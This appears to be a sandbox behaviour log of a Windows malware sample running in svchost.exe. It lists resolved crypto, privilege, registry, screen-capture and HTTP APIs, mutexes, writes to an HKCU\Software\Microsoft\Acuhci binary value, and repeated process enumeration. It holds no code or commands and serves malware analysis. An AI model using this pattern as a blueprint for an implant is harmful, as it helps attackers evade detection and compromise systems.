| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x75ad0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = 20BC29E135FB9B01285187E3B5593CC8 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\pyidom, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\usontoi, type = file_attributes |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
